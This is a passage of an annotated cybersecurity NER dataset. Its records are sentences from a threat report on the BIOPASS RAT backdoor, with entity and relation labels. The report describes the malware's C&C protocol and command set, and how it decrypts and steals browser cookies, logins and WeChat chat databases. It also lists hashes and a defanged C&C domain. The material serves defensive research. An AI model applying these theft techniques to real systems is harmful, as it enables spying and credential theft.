1.","entities":[{"id":48356,"label":"malware","start_offset":146,"end_offset":151},{"id":48357,"label":"SOFTWARE","start_offset":79,"end_offset":85},{"id":48358,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":48359,"label":"SOFTWARE","start_offset":227,"end_offset":233},{"id":48360,"label":"SOFTWARE","start_offset":191,"end_offset":197},{"id":9858,"label":"tools","start_offset":117,"end_offset":130},{"id":9860,"label":"malware","start_offset":265,"end_offset":276}],"relations":[],"Comments":[]} -{"id":3236,"text":"The scheduled tasks created by BIOPASS RAT The BIOPASS RAT malware loads a Python script, “online.txt” that will open an HTTP server that listens on one of the following port numbers: 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, or 62880.","entities":[{"id":48362,"label":"FILEPATH","start_offset":93,"end_offset":103},{"id":48361,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":9862,"label":"malware","start_offset":31,"end_offset":42},{"id":9863,"label":"malware","start_offset":49,"end_offset":60}],"relations":[],"Comments":[]} -{"id":3237,"text":"The HTTP server does nothing but returns string “BPSV3” to request.","entities":[],"relations":[],"Comments":[]} -{"id":3238,"text":" A second HTTP server will also be created to listen on one of the aforementioned port numbers.","entities":[],"relations":[],"Comments":[]} -{"id":3239,"text":"The second HTTP server behaves the same as the first but returns a string, “dm_online”, instead.","entities":[],"relations":[],"Comments":[]} -{"id":3240,"text":"These are the markers of infection as previously mentioned.","entities":[],"relations":[],"Comments":[]} -{"id":3241,"text":"After the servers are established and running, the backdoor creates an execution root directory in the folder “%PUBLIC%\/BPS\/V3\/”.","entities":[{"id":48363,"label":"FILEPATH","start_offset":111,"end_offset":127}],"relations":[],"Comments":[]} -{"id":3242,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":3243,"text":"The script of a simple HTTP server to return string “dm_online” If the malware finds that the system username is “vbccsb”","entities":[],"relations":[],"Comments":[]} -{"id":3244,"text":", it will stop.","entities":[],"relations":[],"Comments":[]} -{"id":3245,"text":"It must be noted that “vbccsb” is the default username on ThreatBook Cloud Sandbox, a popular alternative to VirusTotal in China.","entities":[{"id":48364,"label":"location","start_offset":123,"end_offset":128},{"id":48365,"label":"SOFTWARE","start_offset":109,"end_offset":119},{"id":48366,"label":"SOFTWARE","start_offset":58,"end_offset":82}],"relations":[],"Comments":[]} -{"id":3246,"text":"If the backdoor finds that the file “debug” present inside the root directory, it will wait for 130 seconds and then continue with execution. Figure 16.","entities":[],"relations":[],"Comments":[]} -{"id":3247,"text":"The script used to check the username and debug mode ","entities":[],"relations":[],"Comments":[]} -{"id":3248,"text":"Next, the backdoor will try to read the file “bps.key” inside the root directory.","entities":[{"id":48367,"label":"FILEPATH","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} -{"id":3249,"text":"This file contains the victim ID assigned by the command-and-control (C&C) server.","entities":[],"relations":[],"Comments":[]} -{"id":3250,"text":"If the file hasn’t been created, it will set the victim ID to a null value until the C&C server assigns it.","entities":[],"relations":[],"Comments":[]} -{"id":3251,"text":"At the end of initialization, it collects the information of the victim’s system and initializes values in the global config variable that contains important configuration information.","entities":[],"relations":[],"Comments":[]} -{"id":3252,"text":"This includes the backdoor version (we observed V2 and V3), access keys, endpoint address, the bucket name for Alibaba Cloud OSS, and a URL for downloading the utility sc.exe that is used for taking screenshots.","entities":[{"id":48369,"label":"FILEPATH","start_offset":168,"end_offset":174},{"id":48368,"label":"Infrastucture","start_offset":111,"end_offset":128}],"relations":[],"Comments":[]} -{"id":3253,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} -{"id":3254,"text":"The BPS backdoor global configuration variable The backdoor communicates with the C&C server using the Socket.io protocol.","entities":[{"id":48370,"label":"malware","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3255,"text":"The C&C communication is encrypted with AES ECB algorithm using a hard-coded password, ZLIB compression, and base85 encoding.","entities":[],"relations":[],"Comments":[]} -{"id":3256,"text":"Figures 18 and 19 show how the malware sends the “join” event to initialize C&C communication and attach the victim’s encrypted data.","entities":[],"relations":[],"Comments":[]} -{"id":3257,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} -{"id":3258,"text":"Encoded “join” event sent to the C&C server Figure 19.","entities":[],"relations":[],"Comments":[]} -{"id":3259,"text":"Decoded “join” event sent to the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":3260,"text":"It’s important to note that attributes like IP address, computer and username, architecture, installed antivirus, and geolocation are included.","entities":[],"relations":[],"Comments":[]} -{"id":3261,"text":" The BIOPASS RAT malware registers three custom Socket.io event handlers:","entities":[{"id":9917,"label":"malware","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} -{"id":3262,"text":"1. The “notice” handler is used for checking the connection with the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":3263,"text":"The backdoor regularly sends a “notice” event to the server and records the timestamp if it also receives a “notice” event as the response.","entities":[],"relations":[],"Comments":[]} -{"id":3264,"text":"If the malware doesn’t receive any “notice” event within a hard-coded threshold period, it will restart.","entities":[],"relations":[],"Comments":[]} -{"id":3265,"text":"2. The “set key” handler is used for accepting the victim ID, a random string with six characters, assigned by the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":3266,"text":"It will be attached in each of commands sent from the server and will also be used as the folder name on a cloud storage service to save the stolen data.","entities":[],"relations":[],"Comments":[]} -{"id":3267,"text":"The victim ID will be stored in the “bps.key” file.","entities":[{"id":48371,"label":"FILEPATH","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3268,"text":" 3. The “accept task” handler is the main handler used to process the command sent from the C&C server and to return the execution result.","entities":[],"relations":[],"Comments":[]} -{"id":3269,"text":"We share more details of each command in the next section.","entities":[],"relations":[],"Comments":[]} -{"id":3270,"text":"After the malware joins the C&C server, the server will assign a victim ID with “set key” event and send multiple “accept task” events with the commands “ScreenShot”, “SnsInfo”, “PackingTelegram”, “GetBrowsersCookies”, “GetBrowsersLogins”, “GetBrowsersHistories”, and “GetBrowsersBookmarks” to instruct the malware to collect private data from the victim.","entities":[],"relations":[],"Comments":[]} -{"id":3271,"text":"A closer look at the BIOPASS RAT commands","entities":[{"id":9935,"label":"malware","start_offset":21,"end_offset":32}],"relations":[],"Comments":[]} -{"id":3272,"text":"The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.","entities":[{"id":9936,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3273,"text":"A summary of commands is listed in Table 2, while additional details of some commands are explained in the following section.","entities":[],"relations":[],"Comments":[]} -{"id":3274,"text":" Command Behavior Compress_Files Compresses specified files or directories to a ZIP archive Decompress_File Extracts files from a specified ZIP archive AutoRun Creates a scheduled task for persistence CloseEverything Kills the Everything process with the command “TASKKILL \/F \/IM Everything.exe” OpenEverything Downloads and runs Everything from voidtools CloseFFmpegLive Kills the FFmpeg process with the command “TASKKILL \/F \/IM ffmpeg.exe” OpenFFmpegLive Downloads and runs FFmpeg (for screen video capture) DeleteFile Deletes files or directories at specified locations CreateDir Creates a directory at a specified location ShowFiles Gets the disk partition or lists a specified directory with detailed information, including file name, file path, size, create time, and time of modification Download_File Downloads a URL and saves the file to a specified location Upload_File Uploads the victim’s files to cloud storage uUninstall Kills the BIOPASS RAT process and deletes installed files. CloseObsLive Kills the OBS process with command “TASKKILL \/F \/IM obs64.exe” Open_Obs_Live Downloads OBS Studio and starts live streaming ProcessList Lists processes on the victim’s environment and their process identifier (PID) KillProcess Kills the process specified by PID with the TASKKILL command ScreenShot Takes a screenshot and uploads it to cloud storage Shell Executes commands or scripts (subcommands with prefixes subprocess, python, noreturn, getversion, restart) SnsInfo Lists QQ, WeChat, and Aliwangwang directories InstallTcpdump Downloads and installs the tcpdump tool PackingTelegram Compresses and uploads Telegram's “tdata” directory to cloud storage CloseProxy Kills frpc process with command “TASKKILL \/F \/IM frpc.exe” OpenProxy Downloads and installs the frp proxy client in the “%PUBLIC%” folder OpenVnc Downloads and installs jsmpeg-vnc tool in the “%PUBLIC%\/vnc\/” folder CloseVnc Kills the VNC process with the command “TASKKILL \/F \/IM vdwm.exe” GetBrowsersCookies Decrypts the cookie file of the browser and uploads it to cloud storage GetBrowsersLogins Decrypts the login file of the browser and uploads it to cloud storage GetBrowsersHistories Uploads the history file of the browser to cloud storage GetBrowsersBookmarks Uploads the bookmark file of the browser to cloud storage Table 2.","entities":[{"id":48372,"label":"FILEPATH","start_offset":289,"end_offset":303}],"relations":[],"Comments":[{"id":1,"comment":"exclude"}]} -{"id":3275,"text":"BIOPASS RAT commands OpenEverything The malware downloads “Everything” files if the “Everything” binary is not found in the “%TEMP%” folder.","entities":[{"id":48373,"label":"FILEPATH","start_offset":128,"end_offset":134},{"id":9976,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3276,"text":"It then changes the port number of the HTTP server inside the configuration file and starts the Everything process, which will open an HTTP server to allow the threat actor to access the file system of the victim.","entities":[],"relations":[],"Comments":[]} -{"id":3277,"text":"OpenFFmpegLive The malware downloads FFmpeg files if they are not found on the victim’s machine.","entities":[{"id":48374,"label":"malware","start_offset":0,"end_offset":14},{"id":48375,"label":"SOFTWARE","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3278,"text":"Next, it starts the FFmpeg process to monitor the victim’s desktop via RTMP live streaming to the cloud.","entities":[{"id":48376,"label":"SOFTWARE","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3279,"text":"The malicious actor can then connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} -{"id":3280,"text":"Open_Obs_Live","entities":[],"relations":[],"Comments":[]} -{"id":3281,"text":" The malware downloads OBS Studio files if the OBS folder and config file are not found in the root directory.","entities":[{"id":48378,"label":"malware","start_offset":5,"end_offset":12},{"id":48377,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[{"id":408,"from_id":48378,"to_id":48377,"type":"downloads"}],"Comments":[]} -{"id":3282,"text":"It writes the basic config and RTMP config of OBS and then starts the OBS process to monitor the victim’s desktop using RTMP live streaming to the cloud.","entities":[],"relations":[],"Comments":[]} -{"id":3283,"text":"The malicious actor can connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} -{"id":3284,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} -{"id":3285,"text":"The script used to download OBS Studio, prepare the configuration, and start the process ScreenShot","entities":[{"id":48379,"label":"SOFTWARE","start_offset":28,"end_offset":38}],"relations":[],"Comments":[]} -{"id":3286,"text":"The malware downloads the screenshot-cmd tool if it is not found in the root directory.","entities":[],"relations":[],"Comments":[]} -{"id":3287,"text":"It takes a screenshot of the victim’s screen with the tool and saves it as a PNG file with a random number as the file name.","entities":[],"relations":[],"Comments":[]} -{"id":3288,"text":" The malware will then upload the screenshot files to cloud storage.","entities":[],"relations":[],"Comments":[]} -{"id":3289,"text":"Shell","entities":[],"relations":[],"Comments":[]} -{"id":3290,"text":"The malware uses a number of methods to execute the shell command or script.","entities":[],"relations":[],"Comments":[]} -{"id":3291,"text":"The “Shell” command instructs the malware to execute a command using the Python function “win32api.ShellExecute” and to return the result to a C&C server, applying a 60-second timeout for command execution.","entities":[{"id":48380,"label":"SOFTWARE","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} -{"id":3292,"text":"If the command has one of the following prefixes, it will perform a specific behavior:","entities":[],"relations":[],"Comments":[]} -{"id":3293,"text":"1. “subprocess”: executes a system command using the Python function “subprocess.Popen”.","entities":[{"id":48381,"label":"SOFTWARE","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} -{"id":3294,"text":"2. “python”: executes a Python script delivered with the command.","entities":[{"id":48382,"label":"SOFTWARE","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} -{"id":3295,"text":"3. “noreturn”: executes a system command using the Python function “win32api.ShellExecute” without waiting for the result.","entities":[{"id":48383,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} -{"id":3296,"text":"4. “getversion”: returns the string “20200202”.","entities":[],"relations":[],"Comments":[]} -{"id":3297,"text":"5. “restart”: kills the process itself and restarts it via scheduled malicious tasks. SnsInfo","entities":[],"relations":[],"Comments":[]} -{"id":3298,"text":"The command will list the installation directory of several popular instant messaging applications including WeChat, QQ, and Aliwangwang and return this information to the C&C server.","entities":[{"id":48384,"label":"SOFTWARE","start_offset":109,"end_offset":115},{"id":48386,"label":"SOFTWARE","start_offset":125,"end_offset":136},{"id":48385,"label":"SOFTWARE","start_offset":117,"end_offset":119}],"relations":[],"Comments":[]} -{"id":3299,"text":"Figures 21 and 22 show the result of running “SnsInfo” command to enumerate messengers.","entities":[],"relations":[],"Comments":[]} -{"id":3300,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} -{"id":3301,"text":"Encoded SUBMIT RESULT command sent to C&C server Figure 22. Decoded SUBMIT RESULT command sent to C&C server None of the Chinese messenger applications has been installed on our testing machine, which explains the result seen in the images.","entities":[],"relations":[],"Comments":[]} -{"id":3302,"text":" GetBrowsersCookies This command is designed to steal cookie information from browsers.","entities":[],"relations":[],"Comments":[]} -{"id":3303,"text":"It will read the “Local State” file to grab the AES secret key of Google Chrome-based browsers.","entities":[{"id":48387,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} -{"id":3304,"text":"Depending on the different argument “type” delivered with the command, it performs different behaviors.","entities":[],"relations":[],"Comments":[]} -{"id":3305,"text":"If the value of the “type” argument is “Chrome”, it will use the AES secret key or DPAPI (for Chrome versions before 80) to decrypt the cookie file.","entities":[{"id":48388,"label":"SOFTWARE","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} -{"id":3306,"text":"The decrypted result will be sent to the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":3307,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} -{"id":3308,"text":"The script to decrypt Chrome’s file with AES or DPAPI decryption If the value of the “type” argument is “File”","entities":[{"id":48389,"label":"SOFTWARE","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} -{"id":3309,"text":", it will directly upload the cookie file to cloud storage.","entities":[],"relations":[],"Comments":[]} -{"id":3310,"text":"The command that we received showed that the targeted browsers include Google Chrome, Microsoft Edge Beta, 360 Chrome, QQ Browser, 2345 Explorer, Sogou Explorer, and 360 Safe Browser.","entities":[{"id":48390,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":48394,"label":"SOFTWARE","start_offset":131,"end_offset":144},{"id":48395,"label":"SOFTWARE","start_offset":146,"end_offset":160},{"id":48396,"label":"SOFTWARE","start_offset":166,"end_offset":182},{"id":48391,"label":"SOFTWARE","start_offset":86,"end_offset":105},{"id":48392,"label":"SOFTWARE","start_offset":107,"end_offset":117},{"id":48393,"label":"SOFTWARE","start_offset":119,"end_offset":129}],"relations":[],"Comments":[]} -{"id":3311,"text":" Figure 24.","entities":[],"relations":[],"Comments":[]} -{"id":3312,"text":"Code showing the command to target Sogou Explorer GetBrowsersLogins","entities":[{"id":48397,"label":"SOFTWARE","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} -{"id":3313,"text":"This command has a nearly identical function to “GetBrowsersCookies”, although it targets a browser’s “Login Data” files instead.","entities":[],"relations":[],"Comments":[]} -{"id":3314,"text":"Additional Findings on BIOPASS RAT ","entities":[{"id":10040,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} -{"id":3315,"text":"Although these are not implemented inside the BIOPASS RAT malware, we have observed two additional plug-ins that are written in Python (“getwechatdb” and “xss_spoof”) and were deployed by the threat actor to a victim who had been infected with Cobalt Strike.","entities":[{"id":48398,"label":"malware","start_offset":46,"end_offset":57},{"id":48399,"label":"SOFTWARE","start_offset":128,"end_offset":134},{"id":48400,"label":"tools","start_offset":244,"end_offset":257}],"relations":[{"id":409,"from_id":48398,"to_id":48400,"type":"uses"}],"Comments":[]} -{"id":3316,"text":"The script “getwechatdb” is used for exfiltrating the chat history from the WeChat Windows client.","entities":[{"id":48401,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} -{"id":3317,"text":"The script will detect the version of the installed WeChat client and grab the decryption key and the user ID.","entities":[{"id":48402,"label":"SOFTWARE","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} -{"id":3318,"text":"The predefined list of offsets is used to locate where the decryption key and the user ID are embedded.","entities":[],"relations":[],"Comments":[]} -{"id":3319,"text":"The list supports 36 different versions of memory offsets for the message client.","entities":[],"relations":[],"Comments":[]} -{"id":3320,"text":" The script will then upload database files inside the WeChat folder including “MicroMsg.db” to cloud storage.","entities":[{"id":48403,"label":"SOFTWARE","start_offset":55,"end_offset":61},{"id":48404,"label":"FILEPATH","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} -{"id":3321,"text":"These database files are used for saving the chat history.","entities":[],"relations":[],"Comments":[]} -{"id":3322,"text":"Finally, the script will print out the client ID and the decryption key that allows the malicious actors to decrypt the stolen database files of the chat history.","entities":[],"relations":[],"Comments":[]} -{"id":3323,"text":" Figure 25.","entities":[],"relations":[],"Comments":[]} -{"id":3324,"text":"A predefined list of memory offset intended to grab information from different versions of WeChat Figure 26.","entities":[{"id":48405,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} -{"id":3325,"text":"The script used to exfiltrate WeChat chat database files The other plug-in, “xss_spoof”, is an archive that contains multiple Python scripts.","entities":[{"id":48406,"label":"SOFTWARE","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} -{"id":3326,"text":"The scripts are designed for web server infection via a cross-site scripting (XSS) attack.","entities":[{"id":48407,"label":"attack-pattern","start_offset":56,"end_offset":89}],"relations":[],"Comments":[]} -{"id":3327,"text":"This plug-in can inject malicious scripts into the response of the victim’s web server by leveraging the WinDivert package, which is used to sniff and manipulate the network traffic on Windows.","entities":[{"id":48408,"label":"SOFTWARE","start_offset":105,"end_offset":114},{"id":48409,"label":"SOFTWARE","start_offset":185,"end_offset":192}],"relations":[],"Comments":[]} -{"id":3328,"text":"The scripts intercept HTTP GET requests that are sent to port 80.","entities":[],"relations":[],"Comments":[]} -{"id":3329,"text":"An “ignore” list is used to filter the file extensions of URLs to avoid manipulating resources that are not JavaScript or HTML.","entities":[],"relations":[],"Comments":[]} -{"id":3330,"text":"The script then modifies the original JavaScript or HTML content and delivers it to website visitors.","entities":[],"relations":[],"Comments":[]} -{"id":3331,"text":" Figure 27.","entities":[],"relations":[],"Comments":[]} -{"id":3332,"text":"The JavaScript payload used to replace the original script of compromised websites The delivered script is almost the same as the malicious script previously discussed in the section on the watering hole attack.","entities":[{"id":48410,"label":"attack-pattern","start_offset":194,"end_offset":214}],"relations":[],"Comments":[]} -{"id":3333,"text":"The script performs checks by scanning localhost to determine if the machine is infected by BIOPASS RAT while showing the fake updated webpages.","entities":[{"id":10089,"label":"malware","start_offset":92,"end_offset":103}],"relations":[],"Comments":[]} -{"id":3334,"text":"It is likely that the malicious actors compromised the web servers first and then ran “xss_spoof” for propagation.","entities":[],"relations":[],"Comments":[]} -{"id":3335,"text":" Figure 28.","entities":[],"relations":[],"Comments":[]} -{"id":3336,"text":"The main script used to manipulate traffic with WinDivert Potential links with the Winnti group","entities":[{"id":48944,"label":"threat-actor","start_offset":87,"end_offset":99},{"id":48943,"label":"tools","start_offset":48,"end_offset":57}],"relations":[{"id":505,"from_id":48944,"to_id":48943,"type":"uses"}],"Comments":[]} -{"id":3337,"text":"We have found several connections between BIOPASS RAT and the Winnti Group:","entities":[{"id":10096,"label":"malware","start_offset":42,"end_offset":53},{"id":48945,"label":"threat-actor","start_offset":62,"end_offset":74}],"relations":[{"id":506,"from_id":48945,"to_id":10096,"type":"uses"}],"Comments":[]} -{"id":3338,"text":"1. We discovered that many BIOPASS RAT loader binaries were signed with two valid certificates.","entities":[{"id":48946,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} -{"id":3340,"text":"It is well known that the Winnti Group has previously used stolen certificates from game studios to sign its malware.","entities":[{"id":48950,"label":"attack-pattern","start_offset":59,"end_offset":78},{"id":48949,"label":"threat-actor","start_offset":26,"end_offset":38}],"relations":[{"id":507,"from_id":48949,"to_id":48950,"type":"uses"}],"Comments":[]} -{"id":3341,"text":" Certificate Thumbprint Valid From Valid To EFB70718BC00393A01694F255A28E30E9D2142A4 12:00 a.m., Jan. 2, 2019 11:59 p.m., Mar. 2, 2021 8CE020AA874902C532B9911A4DCA8EFFA627DC80 12:00 a.m., Sept. 6, 2018 11:59 p.m., Oct. 5, 2021 Table 3.","entities":[{"id":48951,"label":"TIME","start_offset":89,"end_offset":114},{"id":48952,"label":"TIME","start_offset":116,"end_offset":140},{"id":48954,"label":"TIME","start_offset":211,"end_offset":235},{"id":48953,"label":"TIME","start_offset":184,"end_offset":209}],"relations":[],"Comments":[]} -{"id":3342,"text":"Information from the stolen certificates 2. While checking the stolen certificates, we found a server-side variant of the Derusbi malware sample (e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783) that was signed with the same stolen certificate.","entities":[{"id":10119,"label":"SHA2","start_offset":153,"end_offset":217},{"id":48955,"label":"malware","start_offset":129,"end_offset":144}],"relations":[{"id":508,"from_id":10119,"to_id":48955,"type":"indicates"}],"Comments":[]} -{"id":3343,"text":" Derusbi is known to be used by multiple advanced persistent threat (APT) groups.","entities":[{"id":10121,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3344,"text":"The server-side variant has also been noted to be used as a malware loader by the Winnti Group.","entities":[{"id":48956,"label":"threat-actor","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} -{"id":3345,"text":"3. We found an interesting Cobalt Strike loader (a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97) that embeds a URL that leads to the BIOPASS RAT loader.","entities":[{"id":10125,"label":"SHA2","start_offset":54,"end_offset":118},{"id":10126,"label":"malware","start_offset":156,"end_offset":167},{"id":48957,"label":"tools","start_offset":32,"end_offset":45}],"relations":[{"id":509,"from_id":10125,"to_id":48957,"type":"indicates"},{"id":510,"from_id":10125,"to_id":10126,"type":"drops"}],"Comments":[]} -{"id":3346,"text":"However, the URL is unused and was likely left inside the loader as a mistake.","entities":[],"relations":[],"Comments":[]} -{"id":3348,"text":"The Cobalt Strike loader, which has a PDB string “C:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb”, connects to the C&C server “download[.]google-images[.]ml”.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} -{"id":3349,"text":"The domains and the PDB string have been mentioned in a recent report and have been attributed to the Winnti Group.","entities":[{"id":48962,"label":"threat-actor","start_offset":102,"end_offset":114}],"relations":[],"Comments":[]} -{"id":3350,"text":"While these connections allow us to link the malware to the Winnti Group, the different targets between BIOPASS RAT and the current operations by Winnti’s that we are tracking makes associating the two more difficult.","entities":[{"id":48963,"label":"threat-actor","start_offset":60,"end_offset":72},{"id":48964,"label":"malware","start_offset":104,"end_offset":115},{"id":48965,"label":"threat-actor","start_offset":146,"end_offset":152}],"relations":[{"id":515,"from_id":48963,"to_id":48964,"type":"uses"}],"Comments":[]} -{"id":3351,"text":"BIOPASS RAT highlights the importance of downloading from trusted sources BIOPASS RAT is a sophisticated type of malware that is implemented as Python scripts.","entities":[{"id":48967,"label":"malware","start_offset":74,"end_offset":85},{"id":48966,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3352,"text":"It possesses many features, such as the ability to use scheduled tasks as a method of maintaining persistence in the infected system.","entities":[],"relations":[],"Comments":[]} -{"id":3353,"text":" The malware abuses publicly available tools and cloud services for its malicious behavior.","entities":[],"relations":[],"Comments":[]} -{"id":3355,"text":"Given that the malware loader was delivered as an executable disguised as a legitimate update installer on a compromised website, we advise users to be careful with regard to the applications that they download.","entities":[],"relations":[],"Comments":[]} -{"id":3356,"text":"As much as possible, it is recommended to download apps only from trusted sources and official websites to avoid being compromised by attacks such as the one discussed here.","entities":[],"relations":[],"Comments":[]} -{"id":3357,"text":"Organizations can also help protect their end users by implementing security solutions that provide a multilayered defense system that helps with detecting, scanning, and blocking malicious URLs.","entities":[],"relations":[],"Comments":[]} -{"id":3358,"text":"Note that we’ve submitted an abuse report to Alibaba, but we have yet to receive feedback at the time of publication.","entities":[{"id":48969,"label":"identity","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} -{"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} -{"id":3360,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} -{"id":3361,"text":"Python.BIOPASS.A ee4150f18ed826c032e7407468beea3b1f738ba80b75a6be21bb8d59ee345466","entities":[{"id":10175,"label":"SHA2","start_offset":18,"end_offset":82},{"id":48977,"label":"malware","start_offset":0,"end_offset":16}],"relations":[{"id":532,"from_id":10175,"to_id":48977,"type":"indicates"}],"Comments":[]} -{"id":3362,"text":"c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10176,"label":"malware","start_offset":11,"end_offset":22},{"id":48978,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":533,"from_id":48978,"to_id":10176,"type":"indicates"}],"Comments":[]} -{"id":3363,"text":".Python.BIOPASS.A 34be85754a84cc44e5bb752ee3a95e2832e7be1f611dd99e9a1233c812a6dad2 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10177,"label":"SHA2","start_offset":19,"end_offset":83},{"id":10178,"label":"malware","start_offset":96,"end_offset":107},{"id":48979,"label":"malware","start_offset":0,"end_offset":17},{"id":48980,"label":"FILEPATH","start_offset":85,"end_offset":94}],"relations":[{"id":534,"from_id":48979,"to_id":10178,"type":"duplicate-of"},{"id":535,"from_id":48980,"to_id":10177,"type":"duplicate-of"},{"id":536,"from_id":10177,"to_id":10178,"type":"indicates"},{"id":537,"from_id":48980,"to_id":10178,"type":"indicates"}],"Comments":[]} -{"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} -{"id":3365,"text":".Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python 